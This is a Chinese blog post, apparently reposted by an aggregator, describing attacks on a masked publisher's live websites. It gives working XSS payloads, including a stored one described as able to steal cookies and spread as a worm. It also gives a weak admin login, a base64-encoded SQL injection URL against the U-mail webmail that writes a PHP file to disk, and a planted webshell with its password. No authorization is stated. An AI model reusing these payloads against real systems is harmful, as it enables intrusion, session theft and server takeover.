实战挖掘某出版社漏洞集合

Posted 巡安似海

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了实战挖掘某出版社漏洞集合相关的知识,希望对你有一定的参考价值。

0x00 前言

之前挖漏洞时,碰到的一个出版社漏洞,也是挺有名的,看码猜社哈哈。


0x01 主站XSS

主页搜索框,发现是get传参

​http://www.*****.com/so.htm?&KEY=1%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E​

实战挖掘某出版社漏洞集合_网络安全


0x02 个人中心XSS可打Cookie

基本资料,昵称处限制了长度,直接插入payload

下面这张图截错了,修改了昵称后就没法修改了所以没有新图可截,直接在昵称插入payload保存即可

实战挖掘某出版社漏洞集合_漏洞挖掘_02

访问个人中心
昵称处已经空了

http://www.*****.com/blog/2342589/taokejian.htm

实战挖掘某出版社漏洞集合_网络安全_03

实战挖掘某出版社漏洞集合_php_04
结合前台搜索框get型xss,iframe框架隐藏嵌入我的主页链接到搜索框中,传播即可造成xss蠕虫


0x03 分站XSS和弱口令

http://zy.*****.com/sp/getp****p.do

搜索框 弹一下 没啥卵用

实战挖掘某出版社漏洞集合_php_05

某资源平台,弱口令就进去了

http://x***ewm.*****.com/index        admin   123456

实战挖掘某出版社漏洞集合_getshell_06

实战挖掘某出版社漏洞集合_漏洞挖掘_07


0x04 邮件系统&getshell

U-mail​挺老的邮件系统了,很多洞,经过测试,通过注入​into outfile​拿到shell

http://mail.*****.com/

1. 信息泄露

http://mail.*****.com/webmail/customer/autoresp.php
路径泄露:D:\\umail\\WorldClient\\html\\userapply.php
info:http://mail.*****.com//webmail/info.php

2. 注入写马测试

aa’ union select 1,2,3,4,5,6,phpinfo();?>’,8,9,10,11,12,13,14 into outfile 
‘D:/umail/WorldClient/html/src.php’#

上面语句base64转码

YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPD9waHAgZWNobyBwaHBpbmZvKCk7Pz4nLDgsOSwxMCwxMSwxMiwxMywxNCBpbnRvIG91dGZpbGUgJ0Q6L3VtYWlsL1dvcmxkQ2xpZW50L2h0bWwvc3JjLnBocCcj==

访问:

http://mail.*****.com/webmail/fileshare.php?file=YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPD9waHAgZWNobyBwaHBpbmZvKCk7Pz4nLDgsOSwxMCwxMSwxMiwxMywxNCBpbnRvIG91dGZpbGUgJ0Q6L3VtYWlsL1dvcmxkQ2xpZW50L2h0bWwvc3JjLnBocCcj==

实战挖掘某出版社漏洞集合_漏洞挖掘_08实战挖掘某出版社漏洞集合_漏洞挖掘_09

实战挖掘某出版社漏洞集合_php_10实战挖掘某出版社漏洞集合_getshell_11

3. getshell

http://mail.*****.com/webmail/sss.php        密码g

win2008  network service 可秒system,就到这了没再继续了。

实战挖掘某出版社漏洞集合_网络安全_12

以上是关于实战挖掘某出版社漏洞集合的主要内容,如果未能解决你的问题,请参考以下文章

实战 -- 记一次src小组定向挖掘

一个完整挖洞/src漏洞实战流程【渗透测试】

等保2.0+安全实验室+漏洞挖掘+攻防实战,你get了吗?

等保2.0+安全实验室+漏洞挖掘+攻防实战,你get了吗?

实战 | 从零学习CSRF漏洞并配合实战挖掘CSRF漏洞

实战之授权站点漏洞挖掘-邮箱轰炸